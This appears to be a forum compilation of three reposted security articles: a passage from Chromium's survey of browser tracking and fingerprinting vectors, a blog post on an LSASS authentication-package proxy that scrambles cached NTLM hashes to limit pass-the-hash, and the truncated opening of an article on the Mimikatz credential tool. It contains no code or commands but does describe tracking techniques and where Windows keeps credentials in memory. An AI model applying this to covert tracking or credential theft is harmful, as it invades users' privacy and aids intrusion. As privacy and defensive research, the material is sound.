these APIs, the authors expect that the perception and the caveats of using HTML5 storage for storing session identifiers would be similar to the situation with Flash and Silverlight. Cached objects For performance reasons, all mainstream web browsers maintain a global cache of previously retrieved HTTP resources. Although this mechanism is not explicitly designed as a random-access storage mechanism, it can be easily leveraged as such. To accomplish this, a cooperating server may return, say, a JavaScript document with a unique identifier embedded in its body, and set Expires / max-age= headers to a date set in the distant future. Once this unique identifier is stored within a script subresource in the browser cache, the ID can be read back on any page on the Internet simply by loading the script from a known URL and monitoring the agreed-upon local variable or setting up a predefined callback function in JavaScript. The browser will periodically check for newer copies of the script by issuing a conditional request to the originating server with a suitable If-Modified-Since header; but if the server consistently responds to such check with HTTP code 304 (“Not modified”), the old copy will continue to be reused indefinitely. There is no concept of blocking “third-party” cache objects in any browser known to the authors of this document, and no simple way to prevent cache objects from being stored without dramatically degrading performance of everyday browsing. Automated detection of such behaviors is extremely difficult owing to the sheer volume and complexity of cached JavaScript documents encountered on the modern Web. All browsers expose the option to manually clear the document cache. That said, because clearing the cache requires specific action on the part of the user, it is unlikely to be done regularly, if at all. Leveraging the browser cache to store session identifiers is very distinct from using HTTP cookies; the authors are unsure if and how the cookie settings - the convenient abstraction layer used for most of the other mechanisms discussed to date - could map to the semantics of browser caches. Cache metadata: ETag and Last-Modified To make implicit browser-level document caching work properly, servers must have a way to notify browsers that a newer version of a particular document is available for retrieval. The HTTP/1.1 standard specifies two methods of document versioning: one based on the date of the most recent modification, and another based on an abstract, opaque identifier known as ETag. In the ETag scheme, the server initially returns an opaque “version tag” string in a response header alongside with the actual document. On subsequent conditional requests to the same URL, the client echoes back the value associated with the copy it already has, through an If-None-Matchheader; if the version specified in this header is still current, the server will respond with HTTP code 304 (“Not Modified”) and the client is free to reuse the cached document. Otherwise, a new document with a new ETag will follow. Interestingly, the behavior of the ETag header closely mimics that of HTTP cookies: the server can store an arbitrary, persistent value on the client, only to read it back later on. This observation, and its potential applications for browser tracking date back at least to 2000. The other versioning scheme, Last-Modified, suffers from the same issue: servers can store at least 32 bits of data within a well-formed date string, which will then be echoed back by the client through a request header known as If-Modified-Since. (In practice, most browsers don't even require the string to be a well-formed date to begin with.) Similarly to tagging users through cache objects, both of these “metadata” mechanisms are unaffected by the deletion of cookies and related site data; the tags can be destroyed only by purging the browser cache. As with Flash LSOs, use of ETag to allegedly skirt browser cookie settings has been subject to scrutiny. HTML5 AppCache Application Caches allow website authors to specify that portions of their websites should be stored on the disk and made available even if the user is offline. The mechanism is controlled by cache manifests that outline the rules for storing and retrieving cache items within the app. Similarly to implicit browser caching, AppCaches make it possible to store unique, user-dependent data - be it inside the cache manifest itself, or inside the resources it requests. The resources are retained indefinitely and not subject to the browser’s usual cache eviction policies. AppCache appears to occupy a netherworld between HTML5 storage mechanisms and the implicit browser cache. In some browsers, it is purged along with cookies and stored website data; in others, it is discarded only if the user opts to delete the browsing history and all cached documents. Note: AppCache is likely to be succeeded with Service Workers; the privacy properties of both mechanisms are likely to be comparable. Flash resource cache Flash maintains its own internal store of resource files, which can be probed using a variety of techniques. In particular, the internal repository includes an asset cache, relied upon to store Runtime Shared Libraries signed by Adobe to improve applet load times. There is also Adobe Flash Access, a mechanism to store automatically acquired licenses for DRM-protected content. As of this writing, these document caches do not appear to be coupled to any browser privacy settings and can only be deleted by making several independent configuration changes in the Flash Settings Manager UI on macromedia.com. We believe there is no global option to delete all cached resources or prevent them from being stored in the future. Browsers other than Chrome appear to share Flash asset data across all installations and in private browsing modes, which may have consequences for users who rely on separate browser instances to maintain distinct online identities. SDCH dictionaries SDCH is a Google-developed compression algorithm that relies on the use of server-supplied, cacheable dictionaries to achieve compression rates considerably higher than what’s possible with methods such as gzip or deflate for several common classes of documents. The site-specific dictionary caching behavior at the core of SDCH inevitably offers an opportunity for storing unique identifiers on the client: both the dictionary IDs (echoed back by the client using the Avail-Dictionary header), and the contents of the dictionaries themselves, can be used for this purpose, in a manner very similar to the regular browser cache. In Chrome, the data does not persist across browser restarts; it was, however, shared between profiles and incognito modes and was not deleted with other site data when such an operation is requested by the user. Google addressed this in bug 327783. Other script-accessible storage mechanisms Several other more limited techniques make it possible for JavaScript or other active content running in the browser to maintain and query client state, sometimes in a fashion that can survive attempts to delete all browsing and site data. For example, it is possible to use window.name or sessionStorage to store persistent identifiers for a given window: if a user deletes all client state but does not close a tab that at some point in the past displayed a site determined to track the browser, re-navigation to any participating domain will allow the window-bound token to be retrieved and the new session to be associated with the previously collected data. More obviously, the same is true for active JavaScript: any currently open JavaScript context is allowed to retain state even if the user attempts to delete local site data; this can be done not only by the top-level sites open in the currently-viewed tabs, but also by “hidden” contexts such as HTML frames, web workers, and pop-unders. This can happen by accident: for example, a running ad loaded in an <iframe> may remain completely oblivious to the fact that the user attempted to clear all browsing history, and keep using a session ID stored in a local variable in JavaScript. (In fact, in addition to JavaScript, Internet Explorer will also retain session cookies for the currently-displayed origins.) Another interesting and often-overlooked persistence mechanism is the caching of RFC 2617 HTTP authentication credentials: once explicitly passed in an URL, the cached values may be sent on subsequent requests even after all the site data is deleted in the browser UI. In addition to the cross-browser approaches discussed earlier in this document, there are also several proprietary APIs that can be leveraged to store unique identifiers on the client system. An interesting example of this are the proprietary persistence behaviors in some versions of Internet Explorer, including the userData API. Last but not least, a variety of other, less common plugins and plugin-mediated interfaces likely expose analogous methods for storing data on the client, but have not been studied in detail as a part of this write-up; an example of this may be the PersistenceService API in Java, or the DRM license management mechanisms within Silverlight. Lower-level protocol identifiers On top of the fingerprinting mechanisms associated with HTTP caching and with the purpose-built APIs available to JavaScript programs and plugin-executed code, modern browsers provide several network-level features that offer an opportunity to store or retrieve unique identifiers: Origin Bound Certificates (aka ChannelID) are persistent self-signed certificates identifying the client to an HTTPS server, envisioned as the future of session management on the web. A separate certificate is generated for every newly encountered domain and reused for all connections initiated later on. By design, OBCs function as unique and stable client fingerprints, essentially replicating the operation of authentication cookies; they are treated as “site and plug-in data” in Chrome, and can be removed along with cookies. Uncharacteristically, sites can leverage OBC for user tracking without performing any actions that would be visible to the client: the ID can be derived simply by taking note of the cryptographic hash of the certificate automatically supplied by the client as a part of a legitimate SSL handshake. ChannelID is currently suppressed in Chrome in “third-party” scenarios (e.g., for different-domain frames). The set of supported ciphersuites can be used to fingerprint a TLS/SSL handshake. Note that clients have been actively deprecating various ciphersuites in recent years, making this attack even more powerful. In a similar fashion, two separate mechanisms within TLS - session identifiers and session tickets - allow clients to resume previously terminated HTTPS connections without completing a full handshake; this is accomplished by reusing previously cached data. These session resumption protocols provide a way for servers to identify subsequent requests originating from the same client for a short period of time. HTTP Strict Transport Security is a security mechanism that allows servers to demand that all future connections to a particular host name need to happen exclusively over HTTPS, even if the original URL nominally begins with “http://”. It follows that a fingerprinting server could set long-lived HSTS headers for a distinctive set of attacker-controlled host names for each newly encountered browser; this information could be then retrieved by loading faux (but possibly legitimately-looking) subresources from all the designated host names and seeing which of the connections are automatically switched to HTTPS. In an attempt to balance security and privacy, any HSTS pins set during normal browsing are carried over to the incognito mode in Chrome; there is no propagation in the opposite direction, however. It is worth noting that leveraging HSTS for tracking purposes would require establishing log(n) connections to uniquely identify n users, which makes it relatively unattractive, except for targeted uses; that said, creating a smaller number of buckets may be a valuable tool for refining other imprecise fingerprinting signals across a very large user base. Last but not least, virtually all modern browsers maintain internal DNS caches to speed up name resolution (and, in some implementations, to mitigate the risk of DNS rebinding attacks). Such caches can be easily leveraged to store small amounts of information for a configurable amount of time; for example, with 16 available IP addresses to choose from, around 8-9 cached host names would be sufficient to uniquely identify every computer on the Internet. On the flip side, the value of this approach is limited by the modest size of browser DNS caches and the potential conflicts with resolver caching on ISP level. Machine-specific characteristics With the notable exception of Origin-Bound Certificates, the techniques described in section 1 of the document rely on a third-party website explicitly placing a new unique identifier on the client system. Another, less obvious approach to web tracking relies on querying or indirectly measuring the inherent characteristics of the client system. Individually, each such signal will reveal just several bits of information - but when combined together, it seems probable that they may uniquely identify almost any computer on the Internet. In addition to being harder to detect or stop, such techniques could be used tocross-correlate user activity across various browser profiles or private browsing sessions. Furthermore, because the techniques are conceptually very distant from HTTP cookies, the authors find it difficult to decide how, if at all, the existing cookie-centric privacy controls in the browser should be used to govern such practices. EFF Panopticlick is one of the most prominent experiments demonstrating the principle of combining low-value signals into a high-accuracy fingerprint; there is also some evidence of sophisticated passive fingerprints being used by commercial tracking services. Browser-level fingerprints The most straightforward approach to fingerprinting is to construct identifiers by actively and explicitly combining a range of individually non-identifying signals available within the browser environment: User-Agent string, identifying the browser version, OS version, and some of the installed browser add-ons. (In cases where User-Agent information is not available or imprecise, browser versions can be usually inferred very accurately by examining the structure of other headers and by testing for the availability and semantics of the features introduced or modified between releases of a particular browser.) Clock skew and drift: unless synchronized with an external time source, most systems exhibit clock drift that, over time, produces a fairly unique time offset for every machine. Such offsets can be measured with microsecond precision using JavaScript. In fact, even in the case of NTP-synchronized clocks, ppm-level skews may be possible to measure remotely. Fairly fine-grained information about the underlying CPU and GPU, either as exposed directly (GL_RENDERER) or as measured by executing Javascript benchmarks and testing for driver- or GPU-specific differences in WebGL rendering or the application of ICC color profiles to <canvas> data. Screen and browser window resolutions, including parameters of secondary displays for multi-monitor users. The window-manager- and addon-specific “thickness” of the browser UI in various settings (e.g., window.outerHeight - window.innerHeight). The list and ordering of installed system fonts - enumerated directly or inferred with the help of an API such as getComputedStyle. The list of all installed plugins, ActiveX controls, and Browser Helper Objects, including their versions - queried or brute-forced through navigator.plugins[]. (Some add-ons also announce their existence in HTTP headers.) Information about installed browser extensions and other software. While the set cannot be directly enumerated, many extensions include web-accessible resources that aid in fingerprinting. In addition to this, add-ons such as popular ad blockers make detectable modifications to viewed pages, revealing information about the extension or its configuration. Using browser “sync” features may result in these characteristics being identical for a given user across multiple devices. A similar but less portable approach specific to Internet Explorer allows websites to enumerate locally installed software by attempting to load DLL resources via the res:// pseudo-protocol. Random seeds reconstructed from the output of non-cryptosafe PRNGs (e.g. Math.random(), multipart form boundaries, etc). In some browsers, the PRNG is initialized only at startup, or reinitialized using values that are system-specific (e.g., based on system time or PID). According to the EFF, their Panopticlick experiment - which combines only a relatively small subset of the actively-probed signals discussed above - is able to uniquely identify 95% of desktop users based on system-level metrics alone. Current commercial fingerprinters are reported to be considerably more sophisticatedand their developers might be able to claim significantly higher success rates. Of course, the value of some of the signals discussed here will be diminished on mobile devices, where both the hardware and the software configuration tends to be more homogenous; for example, measuring window dimensions or the list of installed plugins offers very little data on most Android devices. Nevertheless, we feel that the remaining signals - such as clock skew and drift and the network-level and user-specific signals described later on - are together likely more than sufficient to uniquely identify virtually all users. When discussing potential mitigations, it is worth noting that restrictions such as disallowing the enumeration of navigator.plugins[] generally do not prevent fingerprinting; the set of all notable plugins and fonts ever created and distributed to users is relatively small and a malicious script can conceivably test for every possible value in very little time. Network configuration fingerprints An interesting set of additional device characteristics is associated with the architecture of the local network and the configuration of lower-level network protocols; such signals are disclosed independently of the design of the web browser itself. These traits covered here are generally shared between all browsers on a given client and cannot be easily altered by common privacy-enhancing tools or practices; they include: The external client IP address. For IPv6 addresses, this vector is even more interesting: in some settings, the last octets may be derived from the device's MAC address and preserved across networks. A broad range of TCP/IP and TLS stack fingerprints, obtained with passive tools such as p0f. The information disclosed on this level is often surprisingly specific: for example, TCP/IP traffic will often reveal high-resolution system uptime data through TCP timestamps. Ephemeral source port numbers for outgoing TCP/IP connections, generally selected sequentially by most operating systems. The local network IP address for users behind network address translation or HTTP proxies (via WebRTC). Combined with the external client IP, internal NAT IP uniquely identifies most users, and is generally stable for desktop browsers (due to the tendency for DHCP clients and servers to cache leases). Information about proxies used by the client, as detected from the presence of extra HTTP headers (Via, X-Forwarded-For). This can be combined with the client’s actual IP address revealed when making proxy-bypassing connections using one of several available methods. With active probing, the list of open ports on the local host indicating other installed software and firewall settings on the system. Unruly actors may also be tempted to probe the systems and services in the visitor’s local network; doing so directly within the browser will circumvent any firewalls that normally filter out unwanted incoming traffic. User-dependent behaviors and preferences In addition to trying to uniquely identify the device used to browse the web, some parties may opt to examine characteristics that aren’t necessarily tied to the machine, but that are closely associated with specific users, their local preferences, and the online behaviors they exhibit. Similarly to the methods described in section 2, such patterns would persist across different browser sessions, profiles, and across the boundaries of private browsing modes. The following data is typically open to examination: Preferred language, default character encoding, and local time zone (sent in HTTP headers and visible to JavaScript). Data in the client cache and history. It is possible to detect items in the client’s cache by performing simple timing attacks; for any long-lived cache items associated with popular destinations on the Internet, a fingerprinter could detect their presence simply by measuring how quickly they load (and by aborting the navigation if the latency is greater than expected for local cache). (It is also possible to directly extract URLs stored in the browsing history, although such an attack requires some user interaction in modern browsers.) Mouse gesture, keystroke timing and velocity patterns, and accelerometer readings (ondeviceorientation) that are unique to a particular user or to particular surroundings. There is a considerable body of scientific research suggesting that even relatively trivial interactions are deeply user-specific and highly identifying. Any changes to default website fonts and font sizes, website zoom level, and the use of any accessibility features such as text color, size, or CSS overrides (all indirectly measurable with JavaScript). The state of client features that can be customized or disabled by the user, with special emphasis on mechanisms such as DNT, third-party cookie blocking, changes to DNS prefetching, pop-up blocking, Flash security and content storage, and so on. (In fact, users who extensively tweak their settings from the defaults may be actually making their browsers considerably easier to uniquely fingerprint.) On top of this, user fingerprinting can be accomplished by interacting with third-party services through the user’s browser, using the ambient credentials (HTTP cookies) maintained by the browser: Users logged into websites that offer collaboration features can be de-anonymized by covertly instructing their browser to navigate to a set of distinctively ACLed resources and then examining which of these navigation attempts result in a new collaborator showing up in the UI. Request timing, onerror and onload handlers, and similar measurement techniques can be used to detect which third-party resources return HTTP 403 error codes in the user’s browser, thus constructing an accurate picture of which sites the user is logged in; in some cases, finer-grained insights into user settings or preferences on the site can be obtained, too. (A similar but possibly more versatile login-state attack can be also mounted with the help of Content Security Policy, a new security mechanism introduced in modern browsers.) Any of the explicit web application APIs that allow identity attestation may be leveraged to confirm the identity of the current user (typically based on a starting set of probable guesses). Fingerprinting prevention and detection challenges In a world with no possibility of fingerprinting, web browsers would be indistinguishable from each other, with the exception of a small number of robustly compartmentalized and easily managed identifiers used to maintain login state and implement other essential features in response to user’s intent. In practice, the Web is very different: browser tracking and fingerprinting are attainable in a large number of ways. A number of the unintentional tracking vectors are a product of implementation mistakes or oversights that could be conceivably corrected today; many others are virtually impossible to fully rectify without completely changing the way that browsers, web applications, and computer networks are designed and operated. In fact, some of these design decisions might have played an unlikely role in the success of the Web. In lieu of eliminating the possibility of web tracking, some have raised hope of detecting use of fingerprinting in the online ecosystem and bringing it to public attention via technical means through browser- or server-side instrumentation. Nevertheless, even this simple concept runs into a number of obstacles: Some fingerprinting techniques simply leave no remotely measurable footprint, thus precluding any attempts to detect them in an automated fashion. Most other fingerprinting and tagging vectors are used in fairly evident ways, but could be easily redesigned so that they are practically indistinguishable from unrelated types of behavior. This would frustrate any programmatic detection strategies in the long haul, particularly if they are attempted on the client (where the party seeking to avoid detection can reverse-engineer the checks and iterate until the behavior is no longer flagged as suspicious). The distinction between behaviors that may be acceptable to the user and ones that might not is hidden from view: for example, a cookie set for abuse detection looks the same as a cookie set to track online browsing habits. Without a way to distinguish between the two and properly classify the observed behaviors, tracking detection mechanisms may provide little real value to the user. Potential directions for future work There may be no simple, universal, technical solutions to the problem of tracking on the Web by parties who are intent on doing so with no regard for user controls. That said, the authors of this page see some theoretical room for improvement when it comes to building simpler and more intuitive privacy controls to provide a better framework for the bulk of interactions with responsible sites and parties on the Internet: The current browser privacy controls evolved almost exclusively around the notion of HTTP cookies and several other very specific concepts that do not necessarily map cleanly to many of the tracking and fingerprinting methods discussed in this document. In light of this, to better meet user expectations, it may be beneficial for in-browser privacy settings to focus on clearly explaining practical privacy outcomes, rather than continuing to build on top of narrowly-defined concepts such as "third-party cookies". We worry that in some cases, interacting with browser privacy controls can degrade one’s browsing experience, discouraging the user from ever touching them. A canonical example of this is trying to delete cookies: reviewing them manually is generally impractical, while deleting all cookies will kick the user out of any sites he or she is logged into and frequents every day. Although fraught with some implementation challenges, it may be desirable to build better heuristics that distinguish and preserve site data specifically for the destinations that users frequently log into or meaningfully interact with. Even for extremely privacy-conscious users who are willing to put up with the inconvenience of deleting one’s cookies and purging other session data, resetting online fingerprints can be difficult and fail in unexpected ways. An example of this is discussed in section 1: if there are ads loaded on any of the currently open tabs, clearing all local data may not actually result in a clean slate. Investing in developing technologies that provide more robust and intuitive ways to maintain, manage, or compartmentalize one's online footprints may be a noble goal. Today, some privacy-conscious users may resort to tweaking multiple settings and installing a broad range of extensions that together have the paradoxical effect of facilitating fingerprinting - simply by making their browsers considerably more distinctive, no matter where they go. There is a compelling case for improving the clarity and effect of a handful of well-defined privacy settings as to limit the probability of such outcomes. We present these ideas for discussion within the community; at the same time, we recognize that although they may sound simple when expressed in a single paragraph, their technical underpinnings are elusive and may prove difficult or impossible to fully flesh out and implement in any browser. Sursa: http://www.chromium.org/Home/chromium-security/client-identification-mechanisms
-
Using an SSP/AP LSASS Proxy to Mitigate Pass-the-Hash Pre-Windows 8.1 mit·i·gate verb make less severe, serious, or painful. "he wanted to mitigate misery in the world" [TABLE=class: vk_tbl vk_gy] [TR] [TD=class: lr_dct_nyms_ttl]synonyms:[/TD] [TD]alleviate, reduce, diminish, lessen, weaken, lighten, attenuate, take the edge off, allay, ease, assuage, palliate, relieve, tone down[/TD] [/TR] [/TABLE] Intro A colleague (Matt Weeks/scriptjunkie) guest posted an article on the passing-the-hash blog @passingthehash) about March being Pass-the-Hash awareness month, updating us on where we are at today regarding the family of issues. I thought this would be a good subject for an opening post. This post mostly concerns pre-Windows 8.1 systems that use Smart Cards and Kerberos as their primary form of authentication. It may apply to other configurations as well. This post covers the very basics of what I did to create a custom Security Support Provider/Authentication Package (SSP/AP) as a proxy in order to help mitigate the problem of LSASS storing NTLM credentials in its memory space. This technique should probably only be used when your primary mode of authentication is something other than NTLM, such as Kerberos, as it will prevent LSASS from properly caching NTLM credentials on the client for later use. While this does not solve the problem and is by no means a perfect solution (that probably has to come from Microsoft), it will at least offer some protection against some of the low hanging fruit attacks. Kerberos and NTLM Hashes Many believe that the solution to Pass-the-Hash is to simply require Kerberos on their network for authentication, thus moving the problem to Pass-the-Ticket. What they don't realize is that the system also generates an NTLM hash that is stored in the LSASS memory, even when it is not used. Without going into too much detail, as its documented elsewhere (see references below) the gist is that the key distribution center provides a hash of the user's credentials to be stored by the client's LSASS in case Kerberos is later unavailable, in which case the client will revert to using the hash for single-sign-on logins/authentication. Because of this, even on a domain that requires Kerberos to login and access network resources, a backup hash is readily available for stealing. The end effect is that, from an attacker's perspective, not much has changed. Any local logins will have their user credential hash stored in the LSASS memory for at least some time as will any remote desktop logins to that system (such as domain admins/privileged users). All the attacker needs to do is grab those hashes from LSASS memory and continue. This was the problem that we were trying to mitigate on the client machines. We'll come back to this... SSP/AP and SSP Proxies What are SSP/APs and SSPs? SSP/APs and SSPs are described on Microsoft's SSP/APs vs SSPs page, but basically they are packages (DLLs) that are loaded by LSASS upon start which can be used for various security mechanisms such as authentication, message integrity, and encryption. Microsoft provides a couple with Windows, to include msv1_0.dll (local interactive logins and NTLM authentication, among others) and kerberos.dll (Kerberos). Microsoft also allows custom SSP/APs and SSPs to be registered and loaded by LSASS as such: To register an SSP/AP, add the name of the package to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Authentication Packages. To register an SSP, add the name of the package to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages. For each package registered, a DLL with that package name (ex: mypackage = mypackage.dll) must exist in the Windows\System32 directory. Once the system restarts, LSASS will load the packages found in those two registry keys and use them as described in the SSP/AP and SSP documentation. What is an SSP/AP or SP Proxy? While researching the LSASS authentication flow and components, I came across a blog by Koby Kahane (Implementing an LSA proxy authentication package) describing how he implemented an LSA proxy authentication package. He did quite a bit of research into proxying msv1_0 in order to test the feasibility of adding additional authentication steps prior to passing control to the original package. When I saw this, one of the first things to come to mind was how could I use this technique to stop LSASS from caching credentials that I did not want used on the domain. Authentication Flow The flow of control through MSV1_0 and Kerberos isn't really documented very much (none officially), so I had to start mostly from scratch in order to identify where the credentials passed in order to determine the easiest locations to grab them. The key function appeared to be LsaApLogonUserEx2 in both Kerberos and MSV1_0. This is where much of the original work is done and where the credentials are returned from, initially. Once the call is made into Kerberos at this function, the credentials are gathered and returned back out to LSASS. Supplemental credentials gathered at this point will be sent to the appropriate security packages registered to handle them (such as MSV1_0 for NTLM) via the SpAddCredentials function. There they are processed by their respective security packages and at a point near the end are fired off to LSASS via the AddCredential function. Note: The order of those two may be reversed as it has been quite some time since I did this. This gave me several points in the chain where I was able to intercept and modify the hash in order to make it unusable before it was cached. Building and Using the Proxies After a colleague and I combed through the information, I decided that I could create a custom proxy in order to keep LSASS from caching the NTLM hashes that Kerberos added as supplemental credentials. There were two places of interest where I could have scrambled the incoming NTLM hash before it was stored. First, I could proxy the Kerberos module and scramble the NTLM hash before it was sent back to LSASS and into the MSV1_0 module or I could catch it as it was coming into MSV1_0 from Kerberos (as well as from any other source). I decided that I would create a proxy for each 'just in case' and then choose one of them after testing, as I felt that the less I messed around with Microsoft's subsystems the less chance something would go wrong. I created two proxies, one for the SSP/AP msv1_0.dll and another for the SSP kerberos.dll. I really needed to handle two different sets of calls. The first set was through the recommended use of the SpLsaModeInitialize and SpUserModeInitialize functions as described by Koby and the MSDN documentation, requiring you to create and populate the function tables accordingly, replacing any proxied functions with your own. The second method was by exporting and proxying the functions available in the original DLLs (such as through jmp tables initialized upon load) for any application that may bypass the tables entirely (don't always count on other programs to do things the way they are supposed to do them). MSV1_0 For the MSV1_0 proxy, the SpAddCredentialsPackage function needed to be proxied by saving the original pointer and placing a pointer to the new one into the returned function table in its place. This is where the incoming NTLM credentials would be intercepted and modified before being passed onto the real MSV1_0 (via its SpAddCredentialsPackage) and stored/cached. In the new function, I wanted to be selective about which logon types for which I scrambled the credentials as I still wanted local services to be able to start up and authenticate with the local system. To do this, I checked the incoming SECURITY_LOGON_TYPE parameter for the service type (or any other type that you want to allow to cache NTLM credentials - preferably only local accounts) and just pass on through to the original function then return. For everything else, I grabbed the PSECPKG_SUPPLEMENTAL_CRED structure and verified that the package name was "NTLM". If this was the case, I scrambled the LmPassword and NtPassword parts of that structure. Once that is done I just called the original function, passing in the scrambled supplemental credentials to the real MSV1_0. MSV1_0 takes them and LSASS will cache the useless hash into its memory. KERBEROS For the KERBEROS proxy (and the MSV1_0 proxy if you wish to also handle the hash coming from an interactive login at an earlier point in the process), I proxied and modified LsaApLogonUserEx2. In this case, I called the original as normal and intercepted the credentials being returned from that call. At that point, I used the same logic to check and scramble the supplemental (NTLM) credentials before returning. One other place that the credentials can be intercepted is at the point just prior to going into LSASS itself. This requires intercepting the proxied package's call to LASS' AddCredentials function, which is passed in via a function table during SpInitialize. In this case, the AddCredentials pointer is replaced by a pointer to a new function before passing the table to the original package such that when the original package calls that function to add credentials, it goes through the proxied function first. In the proxied function, the credentials need to be unwrapped via LsaUnprotectMemory, scrambled, and then re-wrapped via LsaProtectMemory before being passed into LSASS. This should not be necessary, but can be used as a failsafe. Using the Proxies After the proxies were completed, they needed to be put to use. There are two methods of doing this with pros and cons to each. First, one can simply rename the DLL being proxied to something else while using the real name (msv1_0.dll or kerberos.dll) for the proxy. Second, the original DLLs can keep the same name, using different names for the proxies while changing the registry entries for the Security Packages and/or Authentication Packages. For the former, the problem one may run into is having the DLLs modified when a patch/update comes down the line intended for Microsoft's DLLs. For the latter, someone with access to view those registry keys may notice the names are not what they were supposed to be. Choosing a Proxy In the end I chose to use the MSV1_0 proxy over the Kerberos proxy in order to catch hashes that may come from other packages/programs. When a set of credentials comes into LSASS, it is sent to the appropriate package for handling. In the case of NTLM credentials, they are sent to the MSV1_0 package. You could easily switch to using the Kerberos proxy, catching and scrubbing the supplemental credentials after returning from kerberos.dll in LsaApLogonUserEx2(). This, however, will not catch any NTLM hashes coming from outside of Kerberos. Alternatively, one could use both proxies as opposed to the minimum required to catch most cases. Summary With this technique, a good majority of automated/default attacks can be mitigated against Pass-the-Hash. While there is still a hash cached/stored in memory by LSASS, that hash has been scrambled and is therefore useless. If your systems use NTLM authentication then it probably means that SSO will no longer work resulting in endless login prompts when attempting to use remote resources. It's really only useful for networks that want to force Kerberos at the expense of legacy compatibility. Also, I need to reiterate that this does not solve the whole problem. There are other issues which I will not go into but my team had to solve such as protecting the proxies from attack. A sophisticated attacker has several methods in which this can be easily defeated if it is not protected. The proxies do absolutely nothing to mitigate an attacker intercepting credentials in other ways such as across the network or Pass-the-Ticket. It does help narrow the available target a little bit, and every little bit helps. One final note to keep in mind for anyone following in these footsteps. Mucking around with LSASS can get pretty messy. If you get something wrong you will not know until you've already told LSASS to load up your modules, in which case a crash of LSASS (assuming you don't blue screen) can prevent you from logging into that system again normally. I would advise that you test your development thoroughly using a VM, and once you do try it on a live system be prepared to revert, use a boot disc, or mount the hard drive via another system to fix it. Take heed of that if you are deploying it across a domain. I hope someone finds this useful. It's primarily targeted towards Windows XP and Windows 7, but may continue to apply to Windows 8 as well depending on how Microsoft works the Pass-the-Hash issue. -=[Kevin]=- Addendum A - DeleteSecurityPackage During my research and development relating to using SSP/APs and SSPs, I came across an issue with DeleteSecurityPackage that threw me for a loop. I was working on a system that would remove unauthorized Security Packages on a live system. Research led me to this function in the Windows security API - a function that was documented on MSDN as: Deletes a security support provider from the list of providers supported by Microsoft Negotiate. Attempting to use this function, however, failed. Upon use, the return value from the function was 0x80090302 (SEC_E_UNSUPPORTED_FUNCTION). That didn't seem right since it was documented and I had not found anything while searching the internet from anyone else to say otherwise. After double checking and ensuring that there was no error on my part I broke out my trusty IDA Pro and decided to trace the function back to its roots. After following several proxied jumps I got to the source function DeleteSecurityPackageW (DeleteSecurityPackageA also redirects to this function). Here is what I found: Apparently either Microsoft forgot to implement the function, or more likely discovered that it was a pretty hard problem to tackle without making any assumptions for the end user and decided not to implement it (while leaving the documentation online). To give them some credit, it does seem like it would be a difficult problem - when you remove a security package currently in use, what is your default policy for dealing with accounts logged in using that package? Do you kick them, keep them logged in (if that's possible), prevent removal until they log out? Maybe they decided it was better to just avoid the question altogether. It's not entirely bad that it's not implemented. It means that in order to remove a security package (such as to replace it), typically a reboot is going to be required as LSASS will force one if you try to remove it any other way. Who knows? Anyway, I e-mailed msdn support and posted a notice on the msdn documentation page, but never got a response... so there it is if anyone else is having an issue using it. Addendum B - EnumerateSecurityPackages Another issue that I came across while working with the Windows security APIs relating to LSASS was while using EnumerateSecurityPackages. I needed to use this function in order to monitor what security packages were loaded in order to detect if any were unauthorized. Initially, when I tested this function manually, everything was working fine. Each time I ran my test it showed me all of the currently loaded security packages, including any that I manually loaded after boot using AddSecurityPackage. Once I automated the process to periodically call the function I started seeing problems. What would happen is when a process first called this function it would populate a list with all of the security packages that it saw loaded. Subsequent calls would return the very same list. I double checked and was using FreeContextBuffer just as the documentation specified, but nothing changed. This was a rather annoying issue that I had to somehow overcome. My solution (and my recommended solution if it has not been fixed yet) was to embed a second binary into the parent binary which would be dropped and spawned by the parent each time it needs to be checked. The output of the spawn is easily wrapped and captured by the parent. The spawn can either be a temporary drop or a permanent drop executed periodically by the parent monitoring system. Since only the parent is constantly running, the spawn only needs to make that call and grab the list once per execution. Another e-mail and another post to the documentation on msdn without a response. It may or may not have been fixed by now, but just in case, here's one workaround. References Koby Kahane, 2008 http://kobyk.wordpress.com/2008/08/30/implementing-an-lsa-proxy-authentication-package/ SANS Institute Pass-the-hash attacks: Tools and Mitigation Bashar Ewaida, 2010 Kerberos Working Group Johansson, 2009 Core Labs Hernan Ochoa ...and my former team at MacAulay-Brown... EDITS: 20140327 Added the definition of mitigation to the top in order to prevent any misunderstandings. Added the twitter handle for @passthehash in the introduction. Posted by Kevin Keathley at 5:44 AM Sursa: http://cybernigma.blogspot.ro/2014/03/using-sspap-lsass-proxy-to-mitigate.html
-
Mimikatz and Active Directory Kerberos Attacks by Sean Metcalf Mimikatz is the latest, and one of the best, tool to gather credential data from Windows systems. In fact I consider Mimikatz to be the “swiss army knife” of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French most of the resources describing Mimikatz usage is in French, at least on his blog. The Mimikatz GitHub repository is in English and includes useful information on command usage. Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, LSASS, process in memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn’t prompted each time resource access is requested. The credential data may include NTLM password hashes, LM password hashes (if the password is <15 characters), and even clear-text passwords (to support WDigest and SSP authentication among others. While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), though this doesn’t prevent the system from generating the LM hash in memory. The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework) through the “Invoke-Mimikatz” PowerShell script which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk.” Mimikatz functionality supported by Invoke-Mimikatz is noted below. Benjamin Delpy posted an Excel chart on OneDrive (shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory. (Click image to embiggen) One of the biggest security concerns with Windows today is “Pass the Hash.” Simply stated, Windows performs a one-way hash function on the user’s password and the result is referred to as a “hash.” The one-way hash algorithm changes the password in expected ways given the 